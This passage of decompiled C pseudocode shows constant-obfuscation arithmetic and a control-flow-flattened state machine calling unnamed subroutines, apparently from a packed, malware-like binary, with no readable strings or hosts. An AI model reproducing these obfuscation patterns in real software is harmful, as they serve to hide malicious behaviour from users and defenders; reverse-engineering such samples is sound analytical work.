                                                                                                                      				_v528 = 0xd0c26f;
                                                                                                                      				_v528 = _v528 + 0xffffb09d;
                                                                                                                      				_v528 = _v528 << 0xb;
                                                                                                                      				_v528 = _v528 << 4;
                                                                                                                      				_v528 = _v528 ^ 0x398aae1f;
                                                                                                                      				_v388 = 0x32973e;
                                                                                                                      				_v388 = _v388 << 2;
                                                                                                                      				_v388 = _v388 * 0x2a;
                                                                                                                      				_v388 = _v388 ^ 0x213686d9;
                                                                                                                      				_v536 = 0x39ae26;
                                                                                                                      				_v536 = _v536 << 0xf;
                                                                                                                      				_v536 = _v536 << 0xa;
                                                                                                                      				_v536 = _v536 / _t1179;
                                                                                                                      				_v536 = _v536 ^ 0x00ab5ee0;
                                                                                                                      				_v248 = 0x4dbe58;
                                                                                                                      				_v248 = _v248 + 0xffff3c39;
                                                                                                                      				_v248 = _v248 ^ 0x00419814;
                                                                                                                      				_v512 = 0x88f16f;
                                                                                                                      				_v512 = _v512 ^ 0xa76fdbfb;
                                                                                                                      				_v512 = _v512 >> 6;
                                                                                                                      				_v512 = _v512 >> 8;
                                                                                                                      				_v512 = _v512 ^ 0x0003ac5e;
                                                                                                                      				_v520 = 0xecc987;
                                                                                                                      				_v520 = _v520 + 0xffffc052;
                                                                                                                      				_v520 = _v520 + 0xf02b;
                                                                                                                      				_v520 = _v520 >> 1;
                                                                                                                      				_v520 = _v520 ^ 0x007e0ff3;
                                                                                                                      				_v448 = 0xa9e1d5;
                                                                                                                      				_v448 = _v448 >> 4;
                                                                                                                      				_v448 = _v448 * 0x52;
                                                                                                                      				_v448 = _v448 + 0xffff6960;
                                                                                                                      				_v448 = _v448 ^ 0x036fa180;
                                                                                                                      				_v316 = 0x9fe24f;
                                                                                                                      				_v316 = _v316 + 0xa7e4;
                                                                                                                      				_v316 = _v316 + 0xf070;
                                                                                                                      				_v316 = _v316 ^ 0x00a7512c;
                                                                                                                      				_v192 = 0x8e20a3;
                                                                                                                      				_v192 = _v192 | 0xc4ed4dcd;
                                                                                                                      				_v192 = _v192 ^ 0xc4e9d97e;
                                                                                                                      				_v356 = 0x174f56;
                                                                                                                      				_v356 = _v356 << 0x10;
                                                                                                                      				_v356 = _v356 + 0xffffdf01;
                                                                                                                      				_v356 = _v356 ^ 0x4f50aec2;
                                                                                                                      				_v496 = 0xdc9606;
                                                                                                                      				_v496 = _v496 ^ 0x6ace7a56;
                                                                                                                      				_v496 = _v496 * 0x30;
                                                                                                                      				_v496 = _v496 + 0xfffff4e3;
                                                                                                                      				_v496 = _v496 ^ 0xe3827260;
                                                                                                                      				_v332 = 0xa7fb69;
                                                                                                                      				_v332 = _v332 * 0x63;
                                                                                                                      				_v332 = _v332 << 0xe;
                                                                                                                      				_v332 = _v332 ^ 0x8e6ea02b;
                                                                                                                      				_v340 = 0x77d063;
                                                                                                                      				_v340 = _v340 << 0x10;
                                                                                                                      				_v340 = _v340 | 0x739acc9c;
                                                                                                                      				_v340 = _v340 ^ 0xf3f6b748;
                                                                                                                      				_v348 = 0x5928cc;
                                                                                                                      				_v348 = _v348 >> 0xf;
                                                                                                                      				_t1180 = 0x18;
                                                                                                                      				_v348 = _v348 / _t1180;
                                                                                                                      				_v348 = _v348 ^ 0x000e8dd0;
                                                                                                                      				_v580 = 0xc190b9;
                                                                                                                      				_v580 = _v580 | 0xa624a591;
                                                                                                                      				_v580 = _v580 + 0xe71e;
                                                                                                                      				_v580 = _v580 << 7;
                                                                                                                      				_v580 = _v580 ^ 0x734fcbc3;
                                                                                                                      				_v272 = 0x6fe611;
                                                                                                                      				_v272 = _v272 ^ 0xf87d83ea;
                                                                                                                      				_v272 = _v272 ^ 0xf818aed7;
                                                                                                                      				_v572 = 0x6e5414;
                                                                                                                      				_v572 = _v572 >> 1;
                                                                                                                      				_v572 = _v572 + 0xffff4a68;
                                                                                                                      				_v572 = _v572 >> 2;
                                                                                                                      				_v572 = _v572 ^ 0x00016dfd;
                                                                                                                      				_v336 = 0xd3ff38;
                                                                                                                      				_v336 = _v336 + 0x8bfd;
                                                                                                                      				_v336 = _v336 + 0xd3a2;
                                                                                                                      				_v336 = _v336 ^ 0x00d246e6;
                                                                                                                      				_v328 = 0xf94d52;
                                                                                                                      				_t1273 = 0x3e;
                                                                                                                      				_v328 = _v328 / _t1273;
                                                                                                                      				_t1181 = 0x24;
                                                                                                                      				_v328 = _v328 * 0x1d;
                                                                                                                      				_v328 = _v328 ^ 0x00711f28;
                                                                                                                      				_v540 = 0x8f9a1e;
                                                                                                                      				_v540 = _v540 >> 0x10;
                                                                                                                      				_v540 = _v540 / _t1181;
                                                                                                                      				_v540 = _v540 >> 8;
                                                                                                                      				_v540 = _v540 ^ 0x00084c95;
                                                                                                                      				_v204 = 0x67c7c8;
                                                                                                                      				_v204 = _v204 ^ 0xa03849cc;
                                                                                                                      				_v204 = _v204 ^ 0xa0586462;
                                                                                                                      				_v168 = 0xf8e7c3;
                                                                                                                      				_v168 = _v168 >> 0xe;
                                                                                                                      				_v168 = _v168 ^ 0x000525ac;
                                                                                                                      				_v268 = 0x34c26b;
                                                                                                                      				_v268 = _v268 + 0xffff2a86;
                                                                                                                      				_v268 = _v268 ^ 0x0031ec13;
                                                                                                                      				_v444 = 0x3e264e;
                                                                                                                      				_v444 = _v444 + 0xffff5a03;
                                                                                                                      				_v444 = _v444 + 0xffff0530;
                                                                                                                      				_v444 = _v444 / _t1167;
                                                                                                                      				_v444 = _v444 ^ 0x0004d416;
                                                                                                                      				_v408 = 0xc2db9d;
                                                                                                                      				_v408 = _v408 >> 0xa;
                                                                                                                      				_t1182 = 0x45;
                                                                                                                      				_v408 = _v408 * 0x2e;
                                                                                                                      				_v408 = _v408 ^ 0x0003d428;
                                                                                                                      				_v284 = 0xb1ae15;
                                                                                                                      				_v284 = _v284 / _t1182;
                                                                                                                      				_v284 = _v284 ^ 0x76771441;
                                                                                                                      				_v284 = _v284 ^ 0x7674d71a;
                                                                                                                      				_v176 = 0x3bb565;
                                                                                                                      				_v176 = _v176 >> 8;
                                                                                                                      				_v176 = _v176 ^ 0x00099a5e;
                                                                                                                      				_v556 = 0x6a82d;
                                                                                                                      				_v556 = _v556 | 0x5ffe742f;
                                                                                                                      				_v556 = _v556 ^ 0x54ef9d89;
                                                                                                                      				_v556 = _v556 ^ 0x0b1ff9f1;
                                                                                                                      				_v492 = 0xf83eb1;
                                                                                                                      				_v492 = _v492 + 0xffff2212;
                                                                                                                      				_v492 = _v492 ^ 0x7ea721cb;
                                                                                                                      				_v492 = _v492 << 0xe;
                                                                                                                      				_v492 = _v492 ^ 0x104665e9;
                                                                                                                      				_v260 = 0xd66584;
                                                                                                                      				_v260 = _v260 << 0x10;
                                                                                                                      				_v260 = _v260 ^ 0x6587874e;
                                                                                                                      				_v196 = 0x15bb54;
                                                                                                                      				_t1183 = 0x25;
                                                                                                                      				_v196 = _v196 / _t1183;
                                                                                                                      				_v196 = _v196 ^ 0x00053e57;
                                                                                                                      				_v304 = 0x2a83c9;
                                                                                                                      				_v304 = _v304 + 0xffff5d87;
                                                                                                                      				_t1184 = 0x6d;
                                                                                                                      				_v304 = _v304 * 0x67;
                                                                                                                      				_v304 = _v304 ^ 0x10d4d127;
                                                                                                                      				_v368 = 0xeff39c;
                                                                                                                      				_v368 = _v368 ^ 0xf5cbb50f;
                                                                                                                      				_v368 = _v368 * 0x5c;
                                                                                                                      				_v368 = _v368 ^ 0x190e2d63;
                                                                                                                      				_v452 = 0xbc1e04;
                                                                                                                      				_v452 = _v452 << 5;
                                                                                                                      				_v452 = _v452 + 0xffffa111;
                                                                                                                      				_v452 = _v452 * 0x46;
                                                                                                                      				_v452 = _v452 ^ 0x6ded43b0;
                                                                                                                      				_v532 = 0x100915;
                                                                                                                      				_v532 = _v532 << 2;
                                                                                                                      				_v532 = _v532 / _t1184;
                                                                                                                      				_v532 = _v532 | 0x4dc043eb;
                                                                                                                      				_v532 = _v532 ^ 0x4dc2f031;
                                                                                                                      				_v180 = 0x7666bb;
                                                                                                                      				_v180 = _v180 | 0xd9d36c1a;
                                                                                                                      				_v180 = _v180 ^ 0xd9fe02b9;
                                                                                                                      				_v228 = 0x101871;
                                                                                                                      				_v228 = _v228 + 0xfd23;
                                                                                                                      				_v228 = _v228 ^ 0x00150742;
                                                                                                                      				_v320 = 0x576952;
                                                                                                                      				_v320 = _v320 ^ 0x6dcdfa8e;
                                                                                                                      				_v320 = _v320 ^ 0xbcce16b6;
                                                                                                                      				_v320 = _v320 ^ 0xd150af1c;
                                                                                                                      				_v436 = 0x61cf51;
                                                                                                                      				_v436 = _v436 | 0x824da9c6;
                                                                                                                      				_v436 = _v436 << 9;
                                                                                                                      				_t1185 = 0x60;
                                                                                                                      				_v436 = _v436 * 0x49;
                                                                                                                      				_v436 = _v436 ^ 0xb2c360cd;
                                                                                                                      				_v352 = 0xa391d1;
                                                                                                                      				_v352 = _v352 | 0xdcfa9fff;
                                                                                                                      				_v352 = _v352 ^ 0xdcf1f745;
                                                                                                                      				_v564 = 0xf1659a;
                                                                                                                      				_v564 = _v564 + 0xffff5528;
                                                                                                                      				_v564 = _v564 + 0x18ad;
                                                                                                                      				_v564 = _v564 + 0xffffd31e;
                                                                                                                      				_v564 = _v564 ^ 0x00f86590;
                                                                                                                      				_v280 = 0x69bbd1;
                                                                                                                      				_v280 = _v280 | 0xbb53cb0d;
                                                                                                                      				_v280 = _v280 ^ 0xbb7bc9ca;
                                                                                                                      				_v460 = 0x6f67b0;
                                                                                                                      				_v460 = _v460 + 0x36fc;
                                                                                                                      				_v460 = _v460 / _t1185;
                                                                                                                      				_v460 = _v460 ^ 0xf8a19ae6;
                                                                                                                      				_v460 = _v460 ^ 0xf8a43848;
                                                                                                                      				_v384 = 0x580713;
                                                                                                                      				_v384 = _v384 | 0xcbb08146;
                                                                                                                      				_v384 = _v384 ^ 0x925bb18e;
                                                                                                                      				_v384 = _v384 ^ 0x59a45563;
                                                                                                                      				_v164 = 0x5d29b5;
                                                                                                                      				_v164 = _v164 >> 0xa;
                                                                                                                      				_v164 = _v164 ^ 0x00076669;
                                                                                                                      				_v244 = 0x191d5f;
                                                                                                                      				_v244 = _v244 | 0x49e37966;
                                                                                                                      				_v244 = _v244 ^ 0x49fb1589;
                                                                                                                      				_v188 = 0x46d1ad;
                                                                                                                      				_v188 = _v188 + 0x38d0;
                                                                                                                      				_v188 = _v188 ^ 0x00414091;
                                                                                                                      				_v252 = 0x41545b;
                                                                                                                      				_v252 = _v252 + 0xffff6c46;
                                                                                                                      				_v252 = _v252 ^ 0x0041c692;
                                                                                                                      				_v220 = 0xd9c785;
                                                                                                                      				_v220 = _v220 >> 0xc;
                                                                                                                      				_v220 = _v220 ^ 0x000bd8b6;
                                                                                                                      				_v468 = 0x7d74e9;
                                                                                                                      				_v468 = _v468 + 0xffffbc8b;
                                                                                                                      				_v468 = _v468 + 0xfffffc2d;
                                                                                                                      				_t1186 = 0x57;
                                                                                                                      				_v468 = _v468 / _t1186;
                                                                                                                      				_v468 = _v468 ^ 0x0004d984;
                                                                                                                      				_v160 = 0xd5db41;
                                                                                                                      				_v160 = _v160 ^ 0xba014a41;
                                                                                                                      				_v160 = _v160 ^ 0xbad79809;
                                                                                                                      				_v596 = 0x24c82;
                                                                                                                      				_t1187 = 0x61;
                                                                                                                      				_v596 = _v596 * 0x73;
                                                                                                                      				_v596 = _v596 << 3;
                                                                                                                      				_v596 = _v596 * 0x39;
                                                                                                                      				_v596 = _v596 ^ 0xd6e8d727;
                                                                                                                      				_v212 = 0xac3173;
                                                                                                                      				_v212 = _v212 + 0xffff1aaf;
                                                                                                                      				_v212 = _v212 ^ 0x00aa5431;
                                                                                                                      				_v424 = 0x84c7ec;
                                                                                                                      				_v424 = _v424 ^ 0xbfe14e08;
                                                                                                                      				_v424 = _v424 | 0xf779bbf5;
                                                                                                                      				_v424 = _v424 ^ 0xff77ecd4;
                                                                                                                      				_v292 = 0x84a0ec;
                                                                                                                      				_v292 = _v292 >> 0xb;
                                                                                                                      				_v292 = _v292 << 9;
                                                                                                                      				_v292 = _v292 ^ 0x00233bd5;
                                                                                                                      				_v456 = 0x240b53;
                                                                                                                      				_v456 = _v456 + 0xbda;
                                                                                                                      				_v456 = _v456 * 6;
                                                                                                                      				_v456 = _v456 ^ 0x01019b0f;
                                                                                                                      				_v456 = _v456 ^ 0x00ed75ab;
                                                                                                                      				_v360 = 0x52dd0d;
                                                                                                                      				_v360 = _v360 + 0xffff4155;
                                                                                                                      				_v360 = _v360 >> 4;
                                                                                                                      				_v360 = _v360 ^ 0x000506f6;
                                                                                                                      				_v184 = 0x1af2a0;
                                                                                                                      				_v184 = _v184 + 0xffffa214;
                                                                                                                      				_v184 = _v184 ^ 0x001a94b5;
                                                                                                                      				_v308 = 0x178b81;
                                                                                                                      				_v308 = _v308 + 0xb0e7;
                                                                                                                      				_v308 = _v308 / _t1187;
                                                                                                                      				_v308 = _v308 ^ 0x00003056;
                                                                                                                      				_v440 = 0x97f304;
                                                                                                                      				_v440 = _v440 + 0xffff76b7;
                                                                                                                      				_v440 = _v440 + 0xd8b0;
                                                                                                                      				_v440 = _v440 / _t1273;
                                                                                                                      				_v440 = _v440 ^ 0x00026bef;
                                                                                                                      				_v296 = 0x8e015a;
                                                                                                                      				_v296 = _v296 | 0x4deffbbb;
                                                                                                                      				_v296 = _v296 ^ 0x4de2405b;
                                                                                                                      				_v476 = 0x8a78d0;
                                                                                                                      				_v476 = _v476 ^ 0xbcddba62;
                                                                                                                      				_v476 = _v476 | 0xa4ff36e3;
                                                                                                                      				_v476 = _v476 ^ 0xbcf24d53;
                                                                                                                      				_v428 = 0x223837;
                                                                                                                      				_v428 = _v428 << 0xc;
                                                                                                                      				_v428 = _v428 | 0x54536040;
                                                                                                                      				_v428 = _v428 >> 4;
                                                                                                                      				_v428 = _v428 ^ 0x0773c324;
                                                                                                                      				_v420 = 0x835b13;
                                                                                                                      				_v420 = _v420 >> 1;
                                                                                                                      				_v420 = _v420 ^ 0xf582999a;
                                                                                                                      				_v420 = _v420 ^ 0xf5cdc033;
                                                                                                                      				_v524 = 0xaa0f4a;
                                                                                                                      				_v524 = _v524 * 0xe;
                                                                                                                      				_v524 = _v524 + 0x1755;
                                                                                                                      				_v524 = _v524 | 0x71cd9279;
                                                                                                                      				_v524 = _v524 ^ 0x79cd8a49;
                                                                                                                      				_v156 = 0x329a17;
                                                                                                                      				_v156 = _v156 * 0x53;
                                                                                                                      				_v156 = _v156 ^ 0x10671f15;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t1314 = _t1281 - 0x6706caa;
                                                                                                                      						if(_t1314 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t1314 == 0) {
                                                                                                                      							_t1099 = E0017BC7E();
                                                                                                                      							__eflags = _t1099;
                                                                                                                      							if(_t1099 == 0) {
                                                                                                                      								_t1099 = E0018D8D7();
                                                                                                                      							}
                                                                                                                      							L35:
                                                                                                                      							_t1281 = 0x5a8ed48;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t1315 = _t1281 - 0x4b8a3ed;
                                                                                                                      						if(_t1315 > 0) {
                                                                                                                      							__eflags = _t1281 - 0x5e39908;
                                                                                                                      							if(__eflags > 0) {
                                                                                                                      								__eflags = _t1281 - 0x5eb3b9d;
                                                                                                                      								if(_t1281 == 0x5eb3b9d) {
                                                                                                                      									_t1099 = E0017911A(_v304, _v368,  &_v96, _v452);
                                                                                                                      									__eflags = _t1099;
                                                                                                                      									if(_t1099 == 0) {
                                                                                                                      										_t1099 = _v100;
                                                                                                                      										__eflags = _t1099;
                                                                                                                      										if(_t1099 == 0) {
                                                                                                                      											E0017EF71(_v476, _v420);
                                                                                                                      											_t1099 = _v100;
                                                                                                                      											_pop(_t1195);
                                                                                                                      										}
                                                                                                                      										__eflags = _t1099 - 1;
                                                                                                                      										if(_t1099 == 1) {
                                                                                                                      											_t1099 = E0017EF71(_v524, _v156);
                                                                                                                      											_pop(_t1195);
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										_t1279 = _v236;
                                                                                                                      									}
                                                                                                                      									_t1171 = 0x6141640;
                                                                                                                      									_t1281 = 0x6706caa;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								__eflags = _t1281 - 0x6141640;
                                                                                                                      								if(_t1281 == 0x6141640) {
                                                                                                                      									_t1099 = E0017E81F( &_v56, _v328, _v540);
                                                                                                                      									_t1281 = 0x7d1ce98;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								__eflags = _t1281 - 0x6346a73;
                                                                                                                      								if(_t1281 == 0x6346a73) {
                                                                                                                      									_t1195 = _v164;
                                                                                                                      									_t1099 = E001768DE(_v164, _v244, _v188, _v252, _v136);
                                                                                                                      									_t1311 = _t1311 + 0xc;
                                                                                                                      									_t1281 = 0x9905489;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								__eflags = _t1281 - 0x65c604e;
                                                                                                                      								if(_t1281 != 0x65c604e) {
                                                                                                                      									goto L108;
                                                                                                                      								}
                                                                                                                      								_t1099 = E0017F93D();
                                                                                                                      								__eflags = _t1099;
                                                                                                                      								if(_t1099 == 0) {
                                                                                                                      									L112:
                                                                                                                      									return _t1099;
                                                                                                                      								}
                                                                                                                      								_t1281 = 0x3c9e136;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t1099 = E00184B56();
                                                                                                                      								asm("sbb esi, esi");
                                                                                                                      								_t1288 =  ~_t1099 & 0xf8926140;
                                                                                                                      								__eflags = _t1288;
                                                                                                                      								L43:
                                                                                                                      								_t1281 = _t1288 + 0x9aa8372;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1281 - 0x4c0b16e;
                                                                                                                      							if(_t1281 == 0x4c0b16e) {
                                                                                                                      								_t1099 = E001783A1();
                                                                                                                      								_t1281 = 0x23ce4b2;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1281 - 0x54f2b1f;
                                                                                                                      							if(_t1281 == 0x54f2b1f) {
                                                                                                                      								_t1109 = E00183D41(_v556,  &_v128, _v492,  &_v112);
                                                                                                                      								_pop(_t1195);
                                                                                                                      								__eflags = _t1109;
                                                                                                                      								if(_t1109 != 0) {
                                                                                                                      									_t1099 = _v100;
                                                                                                                      									__eflags = _t1099 - 8;
                                                                                                                      									if(_t1099 != 8) {
                                                                                                                      										__eflags = _t1099;
                                                                                                                      										if(_t1099 == 0) {
                                                                                                                      											L40:
                                                                                                                      											_t1281 = 0x5eb3b9d;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      										__eflags = _t1099 - 1;
                                                                                                                      										if(_t1099 != 1) {
                                                                                                                      											goto L35;
                                                                                                                      										}
                                                                                                                      										goto L40;
                                                                                                                      									}
                                                                                                                      									_t1281 = 0xa9b18c1;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								_t1099 = E0017EF71(_v296, _v428);
                                                                                                                      								_pop(_t1195);
                                                                                                                      								_t1279 = _t1099;
                                                                                                                      								_t1171 = 0x6141640;
                                                                                                                      								goto L35;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1281 - 0x5a8ed48;
                                                                                                                      							if(_t1281 == 0x5a8ed48) {
                                                                                                                      								_t1195 = _v564;
                                                                                                                      								_t1099 = E001768DE(_v564, _v280, _v460, _v384, _v128);
                                                                                                                      								_t1311 = _t1311 + 0xc;
                                                                                                                      								_t1281 = 0x6346a73;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1281 - 0x5cbbc19;
                                                                                                                      							if(_t1281 != 0x5cbbc19) {
                                                                                                                      								goto L108;
                                                                                                                      							}
                                                                                                                      							_t1281 = 0xd9c2f68;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t1315 == 0) {
                                                                                                                      							_t1099 = E0017B186();
                                                                                                                      							_v36 = _t1099;
                                                                                                                      							_t1281 = 0xf21d89d;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t1316 = _t1281 - 0x2e0c14f;
                                                                                                                      						if(_t1316 > 0) {
                                                                                                                      							__eflags = _t1281 - 0x3a5a0c7;
                                                                                                                      							if(_t1281 == 0x3a5a0c7) {
                                                                                                                      								_t1099 = E00182BF6();
                                                                                                                      								_t1281 = 0x4c0b16e;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1281 - 0x3c3a72c;
                                                                                                                      							if(_t1281 == 0x3c3a72c) {
                                                                                                                      								_t1099 = E0017E816();
                                                                                                                      								_v48 = _t1099;
                                                                                                                      								_t1281 = 0x6e1f231;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1281 - 0x3c9e136;
                                                                                                                      							if(_t1281 == 0x3c9e136) {
                                                                                                                      								E0018B391();
                                                                                                                      								_t1099 = E0017BC7E();
                                                                                                                      								asm("sbb esi, esi");
                                                                                                                      								_t1281 = ( ~_t1099 & 0xfee4ef59) + 0x4c0b16e;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1281 - 0x45ab6ad;
                                                                                                                      							if(_t1281 != 0x45ab6ad) {
                                                                                                                      								goto L108;
                                                                                                                      							}
                                                                                                                      							_t1099 = E0017EBF2();
                                                                                                                      							__eflags = _t1099;
                                                                                                                      							if(_t1099 == 0) {
                                                                                                                      								goto L112;
                                                                                                                      							}
                                                                                                                      							_t1281 = 0xef2ebcd;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t1316 == 0) {
                                                                                                                      							_t1121 = E0018BE84();
                                                                                                                      							_t1195 = _v408;
                                                                                                                      							_t1099 = E00176083(_v408,  &_v128, _v284,  &_v136, _v176, _t1121, _v184);
                                                                                                                      							_t1311 = _t1311 + 0x14;
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t1281 = ( ~_t1099 & 0x026e69d0) + 0x2e0c14f;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t1281 == 0x146b067) {
                                                                                                                      							_t1099 = _v360;
                                                                                                                      							_t1281 = 0x6141640;
                                                                                                                      							_v60 = _t1099;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t1281 == 0x18aafdf) {
                                                                                                                      							_t1099 = E0017E243();
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t1281 = ( ~_t1099 & 0x01cf7634) + 0xa315cf9;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t1281 == 0x1ef2704) {
                                                                                                                      							_t1099 = E001770C0(_t1195);
                                                                                                                      							goto L112;
                                                                                                                      						}
                                                                                                                      						if(_t1281 != 0x23ce4b2) {
                                                                                                                      							goto L108;
                                                                                                                      						} else {
                                                                                                                      							_push(_v288);
                                                                                                                      							_t1099 = E00189186(_v300, _v432, _t1195);
                                                                                                                      							goto L112;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					__eflags = _t1281 - 0xb43471f;
                                                                                                                      					if(__eflags > 0) {
                                                                                                                      						__eflags = _t1281 - 0xd9c2f68;
                                                                                                                      						if(__eflags > 0) {
                                                                                                                      							__eflags = _t1281 - 0xecc1136;
                                                                                                                      							if(_t1281 == 0xecc1136) {
                                                                                                                      								E0017EBF2();
                                                                                                                      								_t1099 = E0017EF71(_v308, _v440);
                                                                                                                      								_t1281 = 0x9905489;
                                                                                                                      								goto L108;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1281 - 0xef2ebcd;
                                                                                                                      							if(_t1281 == 0xef2ebcd) {
                                                                                                                      								_t1099 = E001770ED();
                                                                                                                      								__eflags = _t1099;
                                                                                                                      								if(_t1099 == 0) {
                                                                                                                      									goto L112;
                                                                                                                      								}
                                                                                                                      								_t1281 = 0x18aafdf;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1281 - 0xf21d89d;
                                                                                                                      							if(_t1281 != 0xf21d89d) {
                                                                                                                      								goto L108;
                                                                                                                      							}
                                                                                                                      							_t1099 = _v456;
                                                                                                                      							_t1281 = 0x146b067;
                                                                                                                      							_v32 = _t1099;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_t1099 = E0017F435(__eflags);
                                                                                                                      							__eflags = _t1099;
                                                                                                                      							if(_t1099 == 0) {
                                                                                                                      								goto L112;
                                                                                                                      							}
                                                                                                                      							_t1281 = 0xc51c993;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xbbfe55d;
                                                                                                                      						if(_t1281 == 0xbbfe55d) {
                                                                                                                      							_t1099 = E0017B821();
                                                                                                                      							_t1281 = 0xaeb8d3b;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xbf4062e;
                                                                                                                      						if(_t1281 == 0xbf4062e) {
                                                                                                                      							_t1099 = E0017FD8C();
                                                                                                                      							_t1281 = 0xc00d32d;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xc00d32d;
                                                                                                                      						if(_t1281 == 0xc00d32d) {
                                                                                                                      							_t1099 = E00172830();
                                                                                                                      							_t1281 = 0x65c604e;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xc51c993;
                                                                                                                      						if(_t1281 != 0xc51c993) {
                                                                                                                      							goto L108;
                                                                                                                      						}
                                                                                                                      						_t1099 = E00180F7B();
                                                                                                                      						_t1281 = 0x7a9dc43;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_v76 = E0017EDFC();
                                                                                                                      						_t1195 = _v496;
                                                                                                                      						_t1099 = E0017C24A(_v496, _t1135, _v332, _v340, _v348);
                                                                                                                      						_t1311 = _t1311 + 0xc;
                                                                                                                      						_v72 = _t1099;
                                                                                                                      						_t1281 = 0x3c3a72c;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1281 - 0x9aa8372;
                                                                                                                      					if(__eflags > 0) {
                                                                                                                      						__eflags = _t1281 - 0xa2fb2e2;
                                                                                                                      						if(_t1281 == 0xa2fb2e2) {
                                                                                                                      							_t1099 = E001804B8();
                                                                                                                      							_t1281 = 0xbf4062e;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xa315cf9;
                                                                                                                      						if(_t1281 == 0xa315cf9) {
                                                                                                                      							_t1139 = E0018BE8C();
                                                                                                                      							__eflags = _t1139;
                                                                                                                      							if(_t1139 == 0) {
                                                                                                                      								_t1099 = E0017BC7E();
                                                                                                                      								asm("sbb esi, esi");
                                                                                                                      								_t1281 = ( ~_t1099 & 0xfe3bacb4) + 0xbf4062e;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							_t1099 = E0017BC7E();
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t1288 =  ~_t1099 & 0xfc391596;
                                                                                                                      							goto L43;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xa9b18c1;
                                                                                                                      						if(_t1281 == 0xa9b18c1) {
                                                                                                                      							_t1099 = E00173FB8();
                                                                                                                      							goto L112;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xaeb8d3b;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_v144 = E0018EAE6(0x171060, _v256, __eflags, _v264, _v568,  &_v140, _v576);
                                                                                                                      							_v152 = E0018EAE6(0x171000, _v552, __eflags, _v560, _v412,  &_v148, _v416);
                                                                                                                      							_t1147 = E0018EBFF( &_v152, _v544, _v396,  &_v144, _v404);
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t1281 = ( ~_t1147 & 0x0805135d) + 0x6c6fdd9;
                                                                                                                      							E0017AE03(_v528, _v388, _v536, _v152);
                                                                                                                      							_t1195 = _v248;
                                                                                                                      							_t1099 = E0017AE03(_v248, _v512, _v520, _v144);
                                                                                                                      							_t1311 = _t1311 + 0x3c;
                                                                                                                      						}
                                                                                                                      						goto L108;
                                                                                                                      					}
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t1099 = E00176C29();
                                                                                                                      						_t1281 = 0xbbfe55d;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1281 - 0x6e1f231;
                                                                                                                      					if(_t1281 == 0x6e1f231) {
                                                                                                                      						_t1099 = E0017AE9A();
                                                                                                                      						_v28 = _t1099;
                                                                                                                      						_t1281 = 0x4b8a3ed;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1281 - 0x7a9dc43;
                                                                                                                      					if(_t1281 == 0x7a9dc43) {
                                                                                                                      						_t1099 = E001874DD();
                                                                                                                      						__eflags = _t1099;
                                                                                                                      						if(_t1099 == 0) {
                                                                                                                      							goto L112;
                                                                                                                      						}
                                                                                                                      						_t1281 = 0x45ab6ad;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1281 - 0x7d1ce98;
                                                                                                                      					if(_t1281 == 0x7d1ce98) {
                                                                                                                      						_t1099 = E0018129C( &_v136, _v204, _v168,  &_v84);
                                                                                                                      						asm("sbb esi, esi");
                                                                                                                      						_pop(_t1195);
                                                                                                                      						_t1281 = ( ~_t1099 & 0xfcac56dc) + 0x6346a73;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1281 - 0x9905489;
